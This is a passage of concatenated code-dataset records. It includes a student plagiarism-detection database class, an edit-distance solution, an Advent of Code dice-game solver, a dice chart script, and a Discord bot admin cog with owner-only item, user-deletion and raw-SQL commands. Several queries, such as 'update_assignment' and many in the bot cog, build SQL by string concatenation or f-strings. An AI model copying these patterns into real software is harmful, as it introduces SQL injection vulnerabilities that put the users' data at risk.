number, student number and\n programming language in order to insert relevant data into database.\n '''\n\n def store_submission(self,concatenated_file, assignment_number, student_number, langauge):\n c = self.conn.cursor()\n submission_value = (student_number, assignment_number, concatenated_file, langauge)\n\n c.execute(\"INSERT INTO Submissions (StudentId,AssignmentNumber, ProgramSource, ProgrammingLanguage) VALUES (?,?,?,?)\",submission_value)\n submission_id = c.lastrowid\n c.close()\n self.conn.commit()\n return submission_id\n\n\n\n '''Lookup_signatures looks up signatures which will be used to check for potential cheating or copied code. This\n assignment accepts the submission ID as a parameter and returns the relevant matches'''\n\n def lookup_matching_signatures(self, submission_id):\n return self.signature_manager.lookup_matching_signatures(submission_id)\n\n '''Data populate is a method used to insert students into the database for testing. This method accepts the student\n number and course code to populate the database with relevant information.'''\n\n def data_populate(self,student_number, course_code):\n c = self.conn.cursor()\n data_Values = (student_number,course_code)\n c.execute(\"INSERT INTO Students (StudentNumber, CourseCode) VALUES (?,?)\",data_Values)\n c.close()\n self.conn.commit()\n\n '''fetch_student fetches a student from the database with necessary data.\n This method accepts the student id and is then found\n in the database.\n '''\n\n def fetch_student(self,studentId):\n c = self.conn.cursor()\n c.execute('SELECT Id, StudentNumber,CourseCode FROM Students where Id =?', (studentId,))\n student = []\n for x in c:\n student = Student(\n id = x[0],\n course_code = x[1],\n student_number = x[2]\n )\n c.close()\n return student\n\n '''fetch_an_assignment fetches all assignment submissions from a requested assignment and is used to look in the UI\n in order to display/illustrate potential cheating in code. This method accepts the assignment number and is then found\n in the database.\n '''\n\n def fetch_an_assignment(self,assignmentNumber):\n c = self.conn.cursor()\n c.execute('SELECT Id, CourseCode, AssignmentDescription, DueDate FROM Assignments WHERE Id=?' ,(assignmentNumber, ))\n assignment = None\n for x in c:\n assignment = Assignment(\n id = x[0],\n course_code = x[1],\n description = x[2],\n due_date = x[3]\n )\n c.close()\n return assignment\n\n '''fetch_current_assignments fetches assignments which have already been submitted in order to check the assignments\n against each other for matches'''\n\n def fetch_current_assignments(self):\n c = self.conn.cursor()\n date = time.strftime('%Y-%m-%d')\n c.execute('SELECT Id, CourseCode, AssignmentDescription, DueDate, DueDate < ? FROM Assignments',(date,))\n assignments = []\n for row in c:\n count = self.count_submissions(row[0])\n assignments.append(Assignment(row[0], row[1], row[2], row[3], row[4], count))\n c.close()\n return assignments\n\n '''fetch_a_submission fetches a specific submission to be compared to another specific assignment. This method accepts\n the submission ID as a parameter and is then found in the database.'''\n def fetch_a_submission(self, assignment_id, submission_id=None):\n if submission_id is None:\n assignment_id, submission_id= None, assignment_id\n c = self.conn.cursor()\n c.execute('SELECT Id, StudentId, AssignmentNumber, ProgramSource, SubmissionDate, '\n 'ProgrammingLanguage, AssignmentNumber FROM Submissions WHERE Id = ?',\n (submission_id, ))\n submission = None\n for x in c:\n if assignment_id is not None:\n assert int(x[6]) == int(assignment_id)\n submission = Submission(\n id=x[0],\n student_number=x[1],\n program_source=x[3],\n assignment_id=x[2],\n submission_date=x[4],\n language=x[5])\n c.close()\n return submission\n\n '''fetch_submissions fetches a specific set of submissions. This method accepts\n the assignment ID as a parameter and is then found in the database.'''\n\n def fetch_submissions(self, assignment_id):\n c = self.conn.cursor()\n submissions = []\n c.execute('SELECT Id, StudentId, AssignmentNumber, ProgramSource, SubmissionDate, '\n 'ProgrammingLanguage FROM Submissions WHERE AssignmentNumber = ?' ,(assignment_id, ))\n for x in c:\n submissions.append(\n Submission(\n id=x[0],\n student_number=x[1],\n program_source=x[3],\n assignment_id=x[2],\n submission_date=x[4],\n language=x[5]))\n c.close()\n return submissions\n\n '''fetch_source_code fetches source code from a specific assignment. This method accepts\n the assignment ID as a parameter and is then found in the database.'''\n\n def fetch_source_codes(self, assignment_id):\n c = self.conn.cursor()\n source_codes = {}\n c.execute('SELECT StudentId, ProgramSource '\n 'ProgrammingLanguage FROM Submissions WHERE AssignmentNumber = ?' ,(assignment_id, ))\n for x in c:\n source_codes[str(x[0])] = x[1]\n c.close()\n return source_codes\n\n '''store_assignment stores a specific assignment that a lecturer has created.\n This method accepts the assignment description and due date as a parameter and is then stored in the database.'''\n\n def store_assignment(self,courseCode, assignment_description,due_date):\n c = self.conn.cursor()\n\n assignmentValues = (assignment_description,due_date,courseCode)\n\n c.execute('INSERT INTO Assignments (AssignmentDescription,DueDate,CourseCode) VALUES (?,?,?)',assignmentValues)\n assignment_id = c.lastrowid\n c.close()\n self.conn.commit()\n return assignment_id\n\n\n '''delete_student deletes a student from the students table.\n This method accepts the student Id as a parameter and is then deleted from the table.'''\n def delete_student(self,studentId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Students where StudentNumber=?' ,(studentId, ))\n c.close()\n self.conn.commit()\n\n '''delete_assignment deletes an assignment from the Assignments table.\n This method accepts the Assignment Id as a parameter and is then deleted from the table.'''\n\n def delete_assignment(self, assignmentNumber):\n c = self.conn.cursor()\n c.execute('DELETE FROM Assignments where Id=?' ,(assignmentNumber, ))\n c.execute('DELETE FROM sqlite_sequence WHERE name=\"Assignments\"')\n self.delete_submissions(assignmentNumber)\n c.close()\n self.conn.commit()\n\n '''update_assignment is a method used in the event that a lecturer has changed the assignment so the changes can be\n stored and then reflected in the database. This method accepts the assignment number, course code, assignment\n desciption and due date as parameters and then updates accordingly'''\n\n def update_assignment(self, assignmentNumber, courseCode, assignmentDescription, dueDate):\n c = self.conn.cursor()\n c.execute('SELECT * FROM Assignments WHERE Id=?', (assignmentNumber, ))\n for row in c:\n course_code = row[1]\n description = row[2]\n if (courseCode):\n course_code = courseCode\n if (assignmentDescription):\n description = assignmentDescription\n if (dueDate):\n dueDate = dueDate\n c.execute('UPDATE Assignments SET CourseCode=\"' + course_code + '\", AssignmentDescription=\"' + description + '\", DueDate=\"' + dueDate + '\" WHERE ID=' + assignmentNumber + ';')\n c.close()\n self.conn.commit()\n\n '''delete_submissions deletes all submissions with a specific assignment number from the submission table.\n This method accepts the assignment number as a parameter and is then deleted from the table.'''\n\n def delete_submissions(self, assignmentNum):\n c = self.conn.cursor()\n c.execute('DELETE FROM Submissions where AssignmentNumber=?' ,(assignmentNum, ))\n c.close()\n self.conn.commit()\n\n '''delete_submission deletes a submission item from the submission table.\n This method accepts the submission Id as a parameter and is then deleted from the table.'''\n\n def delete_submission(self,submissionId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Submissions where Id=?' ,(submissionId, ))\n c.close()\n self.conn.commit()\n\n '''count_submissions counts the number of submissions per assignment.'''\n\n def count_submissions(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Count(*) FROM Submissions WHERE AssignmentNumber=?' ,(assignment_num, ))\n count = c.fetchone()[0]\n c.close()\n return count\n\n\n '''delete_signatures deletes a signature item from the signature table.\n This method accepts the signature Id as a parameter and is then deleted from the table.'''\n\n def delete_signatures(self,signatureId):\n c = self.conn.cursor()\n c.execute('DELETE FROM Signatures where Id=?' ,(signatureId, ))\n c.close()\n self.conn.commit()\n\n '''Fetches the maximum submission Id from the submissions table'''\n\n def fetch_max_submission_id(self):\n c = self.conn.cursor()\n c.execute('SELECT MAX(Id) FROM Submissions')\n max_id = c.fetchone()[0]\n c.close()\n return max_id\n\n '''Fetches the submission with the most matching lines of code from the submissions matches table'''\n\n def fetch_max_submission_match_id(self):\n c = self.conn.cursor()\n c.execute('SELECT MAX(SubmissionId) FROM SubmissionMatches')\n max_id = c.fetchone()[0]\n c.close()\n return max_id\n\n '''Fetches the submission match from the submissions matches table which is specified.'''\n\n def fetch_submission_match(self, submission_id):\n c = self.conn.cursor()\n c.execute('SELECT Id, SubmissionId, MatchSubmissionId, NumberSignaturesMatched, Confidence '\n 'FROM SubmissionMatches WHERE SubmissionId = ?', (submission_id, ))\n row = c.fetchone()\n match = None\n if row:\n match = SignatureMatch(*row)\n c.close()\n\n return match\n '''Updates the submission matches table with the new signature match, submission id and signatires matched.'''\n\n def update_submission_match(self, submission_id, signature_match, match_submission_id, number_signatures_matched, confidence):\n assert submission_id != match_submission_id\n c = self.conn.cursor()\n c.execute('UPDATE SubmissionMatches SET MatchSubmissionId = ?, NumberSignaturesMatched = ?, '\n 'Confidence=? WHERE SubmissionId = ?',\n (match_submission_id, number_signatures_matched, confidence, submission_id))\n c.close()\n self.conn.commit()\n\n '''store_submission_match stores a submission match that has been identified.\n This method accepts the submission ID, other submission ID and the number of match potential\n as a parameter and is then stored in the database.'''\n\n def store_submission_match(self, assignment_id, submission_id, other_submission_id, number_signatures_match, confidence):\n assert int(submission_id) != int(other_submission_id)\n c = self.conn.cursor()\n c.execute('INSERT INTO SubmissionMatches (SubmissionId, MatchSubmissionId, NumberSignaturesMatched, StudentId1, StudentId2, AssignmentId, Confidence)'\n ' VALUES (?, ?, ?, (SELECT StudentId FROM Submissions WHERE Id=?), (SELECT StudentId FROM Submissions WHERE Id=?),?, ?)',\n (submission_id, other_submission_id, number_signatures_match, submission_id, other_submission_id, assignment_id, confidence))\n c.close()\n self.conn.commit()\n\n '''fetch_all_submission_matches fetches all submission matches that has been identified.\n This method accepts the assignment number as a parameter and is then selected from the database.'''\n\n def fetch_all_submission_matches(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Id, SubmissionId, MatchSubmissionId, NumberSignaturesMatched, Confidence, StudentId1, StudentId2 '\n 'FROM SubmissionMatches WHERE AssignmentId = ? ORDER BY Confidence DESC', (assignment_num, ))\n results = []\n for row in c:\n results.append(SignatureMatch(*row))\n c.close()\n return results\n\n '''fetch_report fetches all submissions from an assignment and a report is later generated.\n This method accepts the assignment number as a parameter and is then selected from the database.'''\n\n def fetch_report(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT * FROM Reports WHERE AssignmentNumber=?', (assignment_num, ))\n results = []\n for row in c:\n results.append(row[1])\n c.close()\n return results\n\n '''insert_report_item inserts a new report item for a report which is later generated.\n This method accepts the assignment number and student number as a parameter and is then inserted from the database.'''\n\n def insert_report_item(self, assignment_num, student_num):\n c = self.conn.cursor()\n c.execute('INSERT INTO Reports (StudentNumber, AssignmentNumber) VALUES (?,?)', (student_num, assignment_num, ))\n c.close()\n self.conn.commit()\n\n '''delete_report_items deletes a report item from the report table.\n This method accepts the assignment number and student number as a parameter and is then deleted from the table.'''\n\n def delete_report_items(self, assignment_num, student_nums):\n c = self.conn.cursor()\n student_nums = ','.join(map(\"'{0}'\".format, student_nums))\n query = 'DELETE FROM Reports WHERE AssignmentNumber=%s AND StudentNumber IN (%s)' % (assignment_num, student_nums)\n c.execute(query)\n c.close()\n self.conn.commit()\n\n '''count_cheaters counts the number of student suspected of cheating on a particular assignment. The assignment number\n is entered as a parameter and all relevant data is deleted from the database.'''\n\n def count_cheaters(self, assignment_num):\n c = self.conn.cursor()\n c.execute('SELECT Count(*) FROM Reports WHERE AssignmentNumber=?' ,(assignment_num, ))\n count = c.fetchone()[0]\n c.close()\n return count\n\n '''store_matches stores a match from a particular assignment. The submission id, other student submission id and relevant matches\n are entered as a parameter and all relevant data is deleted from the database.'''\n\n def store_matches(self, submission_id, other_submission_id, matches0, matches1):\n c = self.conn.cursor()\n\n matchstring = '(?, ?, ?, ?, 0),'*len(matches0) + '(?, ?, ?, ?, 1),'*len(matches1)\n matchstring=matchstring[:-1]\n\n matchsubmission = []\n for match in matches0+matches1:\n matchsubmission.append(submission_id)\n matchsubmission.append(other_submission_id)\n matchsubmission.append(match.start_line_mine)\n matchsubmission.append(match.match_length)\n query = 'INSERT INTO Matches (SubmissionId, MatchSubmissionId, MatchStartLine, MatchLength, Direction) VALUES %s' % matchstring\n c.execute(query, matchsubmission)\n c.close()\n self.conn.commit()\n\n '''fetch_matches fetches all matches from a particular assignment. The submission id and direction\n are entered as a parameter and all relevant data is deleted from the database.'''\n\n def fetch_matches(self, submission_id, direction):\n c = self.conn.cursor()\n c.execute('SELECT MatchSubmissionId, MatchStartLine, MatchLength, Direction FROM Matches WHERE '\n 'SubmissionId = ? AND Direction=?', (submission_id, direction))\n matches = []\n for row in c:\n if row[3] == '0':\n matches.append(Match(row[0], row[1], row[2], 0))\n else:\n matches.append(Match(submission_id, row[1], row[2], 0))\n\n c.close()\n return matches\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"cheaters/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":20172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4982981221","text":"class Solution(object):\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n m = len(word1)\n n = len(word2)\n A = [[0 for j in range(n+1)] for i in range(m+1)]\n # A[i][j] is the min edit distance from word1[:i] to word2[:j]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0:\n A[0][j] = j\n elif j == 0:\n A[i][0] = i\n elif word1[i-1] == word2[j-1]:\n A[i][j] = A[i-1][j-1]\n else:\n A[i][j] = 1 + min(A[i-1][j-1], A[i][j-1], A[i-1][j])\n return A[-1][-1]\n","repo_name":"ZiningZhu/Leetcode","sub_path":"072-edit-distance/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74848434361","text":"from collections import defaultdict\nfrom functools import lru_cache\nfrom pprint import pprint\n\nfrom aocd_tools import load_input_data, Grid\n\nEXAMPLE = \"\"\"\"\"\"\n\n\ndef parse(line):\n return line\n\n\ndef run():\n print(\"solution1 = \", solution1(2, 5))\n print(\"solution2 = \", solution2(2, 5))\n\n\ndef deterministic_dice():\n n = 1\n while True:\n yield n\n n += 1\n if n > 100:\n n = 1\n\n\ndef solution1(p1, p2):\n dice = deterministic_dice()\n positions = [p1 - 1, p2 - 1]\n scores = [0, 0]\n turn = 0\n die_rolls = 0\n while all(s < 1000 for s in scores):\n dice_roll = next(dice) + next(dice) + next(dice)\n die_rolls += 3\n positions[turn] += dice_roll\n score = 1 + positions[turn] % 10\n scores[turn] += score\n print(f\"player {turn + 1} rolls {dice_roll} and moves to {score} for a total score of {scores[turn]}\")\n turn = (turn + 1) % 2\n\n return min(scores) * die_rolls\n\n\ndef make_defaultdict_int():\n return defaultdict(int)\n\n\nroll_distribution = defaultdict(int)\nfor r1 in range(1, 4):\n for r2 in range(1, 4):\n for r3 in range(1, 4):\n roll_distribution[sum((r1, r2, r3))] += 1\n\n\n@lru_cache(maxsize=None)\ndef count_wins(score1, score2, pos1, pos2):\n if score1 >= 21: return 1, 0\n if score2 >= 21: return 0, 1\n win1, win2 = 0, 0\n for roll, count in roll_distribution.items():\n new_pos = 1 + (pos1 + roll - 1) % 10\n new_score = score1 + new_pos\n add_win2, add_win1 = count_wins(score2, new_score, pos2, new_pos)\n win1 += add_win1 * count\n win2 += add_win2 * count\n return win1, win2\n\n\ndef solution2(pos1, pos2):\n return count_wins(0, 0, pos1, pos2)\n\n\ndef solution2_aargh(p1, p2):\n roll_distribution = defaultdict(int)\n for r1 in range(1, 4):\n for r2 in range(1, 4):\n for r3 in range(1, 4):\n roll_distribution[sum((r1, r2, r3))] += 1\n\n pprint(roll_distribution)\n\n positions = defaultdict(make_defaultdict_int)\n positions[(p1, p2)][(0, 0)] += 1\n wins1 = wins2 = 0\n\n while positions:\n new_positions = defaultdict(make_defaultdict_int)\n for roll1, count1 in roll_distribution.items():\n for roll2, count2 in roll_distribution.items():\n multiplier = count2 * count1\n for p, scores in positions.items():\n p1, p2 = p\n p1 = 1 + (p1 + roll1 - 1) % 10\n p2 = 1 + (p2 + roll2 - 1) % 10\n for s, count in scores.items():\n s1, s2 = s\n s1 += p1\n s2 += p2\n new_count = count * multiplier\n if s1 >= 21:\n wins1 += new_count\n elif s2 >= 21:\n wins2 += new_count\n else:\n new_positions[(p1, p2)][(s1, s2)] = new_count\n positions = new_positions\n print(wins1, wins2)\n\n return max((wins1, wins2))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"heroworkshop/advent_of_code","sub_path":"y2021/day_21.py","file_name":"day_21.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22699541649","text":"from die import Die\r\nimport pygal\r\n \r\ndie = Die()\r\n \r\n# 数据集合\r\nresults = []\r\ncount = 1\r\nfor roll_num in iter(lambda *args:die.roll(),None):\r\n results.append(roll_num)\r\n if count >= 1000:\r\n break\r\n count +=1\r\n \r\n# 分析结果\r\nfrequencies= []\r\nfor value in range(1,die.num_sides+1):\r\n frequencie = results.count(value)\r\n frequencies.append(frequencie)\r\n \r\n# 对结果进行可视化\r\nhist = pygal.Bar() # 生成实例\r\nhist.title = 'Results of rolling one D6 1000 times' # 标题\r\nhist.x_labels = ['1','2','3','4','5','6'] # X轴数值坐标\r\nhist.x_title = 'Result' # X轴标题\r\nhist.y_title = 'Frequency of Result' # Y轴标题\r\n \r\nhist.add('D6',frequencies) # 传入Y轴数据\r\nhist.render_to_file('die_visual.svg') # 文件生成路径,必须为svg格式文件\r\n\r\n","repo_name":"Kung-Fu-Master/Python","sub_path":"books/Python_Crash_Course/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"39343983961","text":"import json\nfrom functools import partial\nfrom io import BytesIO\nfrom datetime import datetime\nimport os\nimport sys\nimport asyncio\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport discord.errors as discordErrors\nimport pymysql.err as mysqlError\nimport psutil\nfrom tabulate import tabulate\n\nfrom utils import checks\n\n\n\nclass avaAdmin(commands.Cog):\n def __init__(self, client):\n from .avaTools import avaTools\n from .avaUtils import avaUtils\n\n self.client = client\n\n self.utils = avaUtils(self.client)\n self.tools = avaTools(self.client, self.utils)\n\n print(\"|| Admin --- Ready!\")\n\n\n\n # ================== EVENTS ==================\n\n # @commands.Cog.listener()\n # async def on_ready(self):\n # print(\"|| Admin --- Ready!\")\n\n #@commands.command(pass_context=True)\n #@checks.check_author()\n #async def milestime(self, ctx):\n # self.client.STONE = datetime.now()\n # self.data_updating()\n\n\n\n # ================== SYSTEM WIDE ==================\n @commands.command()\n @checks.check_author()\n async def user_block(self, ctx, *args):\n try: self.client.ignore_list.append(ctx.message.mentions[0])\n except IndexError: return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def fetch_invite(self, ctx, *args):\n cns = self.client.get_guild(int(args[0])).channels\n for c in cns:\n try:\n ivi = await c.create_invite(max_uses=2)\n await ctx.send(ivi)\n return\n except discordErrors.NotFound: pass\n except discordErrors.Forbidden: pass\n await ctx.send(\":x: Unable to create invitation.\")\n\n\n\n # ================== GAME MANAGER ==================\n # MEGA\n @commands.command()\n @checks.check_author()\n async def megagive(self, ctx, *args):\n try: target = await commands.MemberConverter().convert(ctx, args[0])\n except commands.CommandError: await ctx.send(\"Invalid `user`\"); return\n except IndexError: await ctx.send(\"Missing `user`\"); return\n\n try: money = int(args[1])\n except IndexError: await ctx.send('Missing `money`'); return\n except ValueError: await ctx.send('Invalid `money`'); return\n\n if await self.client._cursor.execute(f\"UPDATE personal_info SET money=money+{money} WHERE id='{target.id}';\") == 0:\n await ctx.send(f\"User **{target.name}** has not incarnted\"); return\n \n await ctx.send(f\":white_check_mark: Under the name of almighty Aknalumos, **<:36pxGold:548661444133126185>{money}** has been given to **{target.name}**!\"); return\n\n @commands.command()\n @checks.check_author()\n async def megatao(self, ctx, *args):\n try: target = await commands.MemberConverter().convert(ctx, args[0])\n except commands.CommandError: await ctx.send(\"Invalid `user`\"); return\n except IndexError: await ctx.send(\"Missing `user`\"); return\n\n try: item_code = args[1]\n except IndexError: await ctx.send(\"Missing `item_code`\"); return\n\n try: quantity = int(args[2])\n except (ValueError, IndexError): quantity = 1\n\n if item_code.startswith('ig'):\n t = await self.client._cursor.execute(f\"SELECT func_ig_reward('{target.id}', '{item_code}', {quantity}); \")\n elif item_code.startswith('it') or item_code.startswith('ar') or item_code.startswith('am') or item_code.startswith('bp'):\n t = await self.client._cursor.execute(f\"SELECT func_it_reward('{target.id}', '{item_code}', {quantity}); \")\n elif item_code.startswith('if'):\n try: land_code = args[3]\n except IndexError: await ctx.send(\"Missing `land_code`\"); return\n t = await self.client._cursor.execute(f\"SELECT func_if_reward('{land_code}', '{item_code}', {quantity}); \")\n \n if not t: await ctx.send(\":x:\"); print(t); return\n await ctx.send(f\":white_check_mark: Given {quantity} `{item_code}` to **{target.name}**\")\n\n @commands.command()\n @checks.check_author()\n async def megafreeze(self, ctx, *args):\n try:\n target_id = ctx.message.mentions[0].id\n cmd_tag = args[1]\n if cmd_tag.startswith('<@'): cmd_tag = args[0]\n except (IndexError, TypeError): await ctx.send(\":warning: Missing stuff!\"); return\n\n if await self.client.loop.run_in_executor(None, partial(self.client.thp.redio.delete, f'{cmd_tag}{target_id}')) == 0: await ctx.send(':x:')\n else: await ctx.send(':white_check_mark:')\n\n @commands.command()\n @checks.check_author()\n async def megakill(self, ctx, *args):\n if not args: await ctx.send(\":warning: Missing user!\"); return\n try: \n target_id = ctx.message.mentions[0].id\n target_name = ctx.message.mentions[0].mention\n except (IndexError, TypeError):\n target_id = args[0]\n target_name = args[0]\n\n query = f\"\"\"DELETE FROM pi_degrees WHERE user_id='{target_id}';\n DELETE FROM pi_guild WHERE user_id='{target_id}';\n DELETE FROM cosmetic_preset WHERE user_id='{target_id}';\n DELETE FROM pi_arts WHERE user_id='{target_id}';\n UPDATE pi_inventory SET existence='BAD' WHERE user_id='{target_id}';\n UPDATE pi_land SET user_id='BAD' WHERE user_id='{target_id}';\n DELETE FROM pi_bank WHERE user_id='{target_id}';\n DELETE FROM pi_avatars WHERE user_id='{target_id}';\n DELETE FROM pi_hunt WHERE user_id='{target_id}';\n DELETE FROM pi_mobs_collection WHERE user_id='{target_id}';\n DELETE FROM pi_rest WHERE user_id='{target_id}';\n DELETE FROM pi_quests WHERE user_id='{target_id}';\n DELETE FROM personal_info WHERE id='{target_id}';\"\"\"\n\n if await self.client._cursor.execute(query) == 0:\n await ctx.send(':warning: User has not incarnated'); return\n await ctx.send(f\":white_check_mark: Slashed {target_name} into half. Bai ya~\")\n\n # UDA\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def ituda(self, ctx, *args):\n\n codes = await self.client.quefe(f\"SELECT item_code FROM pi_inventory WHERE item_code LIKE 'it%' OR item_code LIKE 'ar%' OR item_code LIKE 'am%';\", type='all')\n\n for code in codes:\n # await self.client._cursor.execute(f\"UPDATE pi_inventory p INNER JOIN model_item m ON m.item_code='{code[0]}' SET p.tags=m.tags, p.weight=m.weight, p.defend=m.defend, p.multiplier=p.multiplier, p.str=m.str, p.intt=m.intt, p.sta=m.sta, p.speed=m.speed, p.round=m.round, p.accuracy_randomness=m.accuracy_randomness, p.accuracy_range=m.accuracy_range, p.range_min=m.range_min, p.range_max=m.range_max, p.firing_rate=m.firing_rate, p.reload_query=m.reload_query, p.effect_query=m.effect_query, p.infuse_query=m.infuse_query, p.passive_query=m.passive_query, p.ultima_query=m.ultima_query, p.price=m.price, p.dmg=m.dmg, p.stealth=m.stealth, p.evo=m.evo, p.aura=m.aura, p.craft_value=m.craft_value, p.illulink=m.illulink, p.origin_base=m.origin_base WHERE p.item_code='{code[0]}';\")\n # Specific\n await self.client._cursor.execute(f\"UPDATE pi_inventory p INNER JOIN model_item m ON m.item_code='{code[0]}' SET p.origin_base=m.origin_base WHERE p.item_code='{code[0]}';\")\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def mobuda(self, ctx, *args):\n\n codes = await self.client.quefe(f\"SELECT DISTINCT mob_code FROM model_mob;\", type='all')\n\n for code in codes:\n await self.client._cursor.execute(f\"UPDATE environ_mob e INNER JOIN model_mob m ON m.mob_code='{code[0]}' SET e.name=m.name, e.description=m.description, e.lp=m.lp, e.str=m.str, e.chain=m.chain, e.speed=m.speed, e.au_FLAME=m.au_FLAME, e.au_ICE=m.au_ICE, e.au_HOLY=m.au_HOLY, e.au_DARK=m.au_DARK, e.effect=m.effect, e.illulink=m.illulink WHERE e.mob_code='{code[0]}';\")\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def world_rebuild(self, ctx, *args):\n try:\n if args[0] == 'truncate': truncate = True\n else: truncate = False\n except IndexError: truncate = False\n\n # TRUNCATE\n if truncate: await self.client._cursor.execute(\"TRUNCATE environ_mob;\")\n\n await self.tools.world_built()\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @commands.cooldown(1, 5, type=BucketType.user)\n @checks.check_author()\n async def world_build(self, ctx, *args):\n await self.tools.world_built()\n await ctx.send(\":white_check_mark:\")\n\n # MISC\n @commands.command()\n @checks.check_author()\n async def view_item(self, ctx, *args):\n\n item_code, name, description, tags, weight, defend, multiplier, strr, intt, sta, speed, round, accuracy_randomness, accuracy_range, range_min, range_max, firing_rate, dmg, stealth, aura, illulink, price = await self.client.quefe(f\"\"\"SELECT item_code, name, description, tags, weight, defend, multiplier, str, intt, sta, speed, round, accuracy_randomness, accuracy_range, range_min, range_max, firing_rate, dmg, stealth, aura, illulink, price FROM pi_inventory WHERE item_id='{args[0]}';\"\"\")\n\n # Pointer\n if 'magic' in tags: pointer = ':crystal_ball:'\n else: pointer = '<:gun_pistol:508213644375621632>'\n # Aura icon\n aui = {'FLAME': 'https://imgur.com/3UnIPir.png', 'ICE': 'https://imgur.com/7HsDWfj.png', 'HOLY': 'https://imgur.com/lA1qfnf.png', 'DARK': 'https://imgur.com/yEksklA.png'}\n\n line = f\"\"\":scroll: **`『Weight』` ·** {weight} ⠀ ⠀:scroll: **`『Price』` ·** {price}\\n\\n```\"{description}\"```\\n\"\"\"\n \n reembed = discord.Embed(title=f\"`{item_code}`|**{' '.join([x for x in name.upper()])}**\", colour = discord.Colour(0x011C3A), description=line)\n reembed.add_field(name=\":scroll: Basic Status <:broadsword:508214667416698882>\", value=f\"**`『STR』` ·** {strr}\\n**`『INT』` ·** {intt}\\n**`『STA』` ·** {sta}\\n**`『MULTIPLIER』` ·** {multiplier}\\n**`『DEFEND』` ·** {defend}\\n**`『SPEED』` ·** {speed}\", inline=True)\n\n try: acc_per = 10//accuracy_randomness\n except ZeroDivisionError: acc_per = 0\n reembed.add_field(name=f\":scroll: Projector Status {pointer}\", value=f\"**`『RANGE』` ·** {range_min} - {range_max}m\\n**`『STEALTH』` ·** {stealth}\\n**`『FIRING-RATE』` ·** {firing_rate}\\n**`『ACCURACY』` ·** {acc_per}/{accuracy_range}m\\n**-------------------**\\n**`『ROUND』` ·** {round} \\n**`『DMG』` ·** {dmg}\", inline=True)\n\n reembed.set_thumbnail(url=aui[aura])\n if illulink != 'n/a': reembed.set_image(url=illulink)\n\n await ctx.send(embed=reembed); return\n\n\n\n # ================== SYS MANIP ==================\n\n @commands.command()\n @checks.check_author()\n async def megasql(self, ctx, *, args):\n if str(ctx.author.id) != '214128381762076672': await ctx.send(\"SHOO SHOO!\"); return\n ret = await self.client.quefe(args, type='all')\n await ctx.send(f\"Total: {len(ret)}\")\n await ctx.send(tabulate(ret, showindex=\"always\"))\n\n @commands.command()\n @checks.check_author()\n async def megareload(self, ctx, *args):\n temp = []\n name = ''\n try:\n for n in args[0].split('.'):\n if n == 'c': temp.append('cogs'); continue\n elif n == 'a': temp.append('avasoul_pack'); continue\n temp.append(n)\n name = '.'.join(temp)\n except IndexError: await ctx.send(\":x: Missing cog's name\"); return\n\n self.client.reload_extension(name)\n \n # Prep =====================\n cog = self.client.get_cog(name.split('.')[-1])\n try:\n await cog.reloadSetup()\n except AttributeError:\n await ctx.send(\":x: Cog not support megareload!\") \n return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def megarecache(self, ctx, *args):\n \"\"\"\n Use the exact name of the database (model_npc, etc.)\n In order to use this in a cog, that cog must have:\n - dict\n - a cache function correspond to a DBC's name in the dict. (e.g. {'model_NPC': self.cacheNPC})\n - a function\n For example, please refer to cogs.avasoul_pack.avaNPC\n \"\"\"\n\n temp = []\n name = ''\n try:\n for n in args[0].split('.'):\n if n == 'c': temp.append('cogs'); continue\n elif n == 'a': temp.append('avasoul_pack'); continue\n temp.append(n)\n name = '.'.join(temp)\n except IndexError: await ctx.send(\":x: Missing cog's name (Note: No `c.a`, only `name` (e.g. `avaPersonal`, NOT `c.a.avaPersonal`))\"); return\n\n cog = self.client.get_cog(name)\n print(name, cog)\n try:\n if args[1] == 'all':\n await cog.cacheAll()\n else:\n await cog.cacheMethod[args[1]]()\n except AttributeError: await ctx.send(\":x: Cog not found. (Note: No `c.a`, only `name` (e.g. `avaPersonal`, NOT `c.a.avaPersonal`))\"); return\n except IndexError: await ctx.send(\":x: Missing database name\"); return\n except KeyError: await ctx.send(\":x: DB not found\"); return\n # except AttributeError: await ctx.send(\":x: Unknown cog\"); return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def megarestart(self, ctx, *args):\n await ctx.send(f\" **Okai!**\")\n os.system(\"python C:/Users/DELL/Desktop/bot_cli/aaaa.py\")\n exit()\n # await client.logout()\n\n @commands.command()\n @checks.check_author()\n async def leave_guild(self, ctx):\n await ctx.send(\"Okay.......\")\n await ctx.guild.leave()\n\n @commands.command()\n @checks.check_author()\n async def shutdown(self, ctx):\n await ctx.send(f\":wave: Bot's successfully shut down by {ctx.message.author}!\")\n exit()\n\n\n\n # ================= MISC ====================\n @commands.command()\n @checks.check_author()\n async def 